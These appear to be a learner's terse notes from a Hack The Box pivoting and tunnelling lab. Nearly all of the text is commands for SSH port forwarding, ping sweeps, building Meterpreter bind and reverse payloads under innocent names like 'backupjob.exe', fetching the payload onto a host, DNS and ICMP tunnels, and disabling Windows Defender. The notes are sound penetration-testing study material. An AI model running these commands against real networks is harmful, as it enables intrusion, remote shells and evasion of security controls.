Laternal movement:  same network
Pivot:  cross network
Tunnel:  key in toy


ifconfig / ipconfig

netstat -antp | grep 1234


Steps:
  get foothold
  ping internal network
  setup tunnel
  atc


Port forwards:
  ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
  ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64
  ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
  
  meterpreter > help portfwd

Ping sweep:
  for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
  1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}
  meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
  or
  msf6 > use auxiliary/server/socks_proxy
  meterpreter > run autoroute -s 172.16.5.0/23


msf bind-shell:
    socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
    msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupjob.exe LPORT=8443
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp

msf reverse-shell:
  msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
  msfconsole -q
  use exploit/multi/handler
  scp playload.exe ubuntu@10.129.202.64:~/
  python3 -m http.server 8123
  curl  / Invoke-WebRequest -Uri "http://172.16.5.129:8123/playload.exe" -OutFile "C:\playload.exe"


Windows ssh / GUI proxychains:
  plink -ssh -D 9050 ubuntu@10.129.15.50
    https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

  https://www.proxifier.com/


sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v 
  https://github.com/sshuttle/sshuttle


Rpivot:
  mattchow@htb[/htb]$ python2 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
  ubuntu@WEB01:~/rpivot$ python2 client.py --server-ip 10.10.14.18 --server-port 9999

  proxychains firefox-esr 172.16.5.135:80
  
  with NTLM:
    python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
  
https://github.com/klsecservices/rpivot


Netsh:
  netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
    netsh.exe interface portproxy show v4tov4
    https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh

Dnscat2:
  ATC host:
  sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
    https://github.com/iagox86/dnscat2

  PWN host:
  PS C:\htb> Import-Module .\dnscat2.ps1
  PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
    https://github.com/lukebaggett/dnscat2-powershell


Chisel:
    scp
    chmod +x chisel

    ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
    mattchow@htb[/htb]$ ./chisel client -v 10.129.202.64:1234 socks
    proxychains xfreerdp /v:DCIP /u:victor /p:pass@123

    mattchow@htb[/htb]$ sudo ./chisel server --reverse -v -p 1234 --socks5
    ubuntu@WEB01$ ./chisel client -v 10.10.14.17:1234 R:socks
    proxychains xfreerdp /v:DCIP /u:victor /p:pass@123

    https://github.com/jpillora/chisel


ICMP:
  sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh
  ./autogen.sh

  scp -r ptunnel-ng ubuntu@STMIP
  ubuntu@WEB01:~$ sudo ./ptunnel-ng/src/ptunnel-ng -r10.129.151.105 -R22
  sudo ./ptunnel-ng/src/ptunnel-ng -p10.129.151.105 -l2222 -r10.129.151.105 -R22

  ssh -D 9050 -p2222 -lubuntu 127.0.0.1
  proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123 /dynamic-resolution

    https://github.com/utoni/ptunnel-ng

Socks in Windows:
  wget https://github.com/nccgroup/SocksOverRDP/releases/download/v1.0/SocksOverRDP-x64.zip
  wget https://www.proxifier.com/download/ProxifierPE.zip

  xfreerdp
  either uninstall or turn off Windows Defender
  scp / cpoy and paste
  AC: regsvr32.exe SocksOverRDP-Plugin.dll
  AC: mstsc.exe

  DC: Uninstall-WindowsFeature -Name Windows-Defender
  scp / cpoy and paste
  DC: mstsc.exe

    https://github.com/nccgroup/SocksOverRDP
    +
    https://www.proxifier.com/


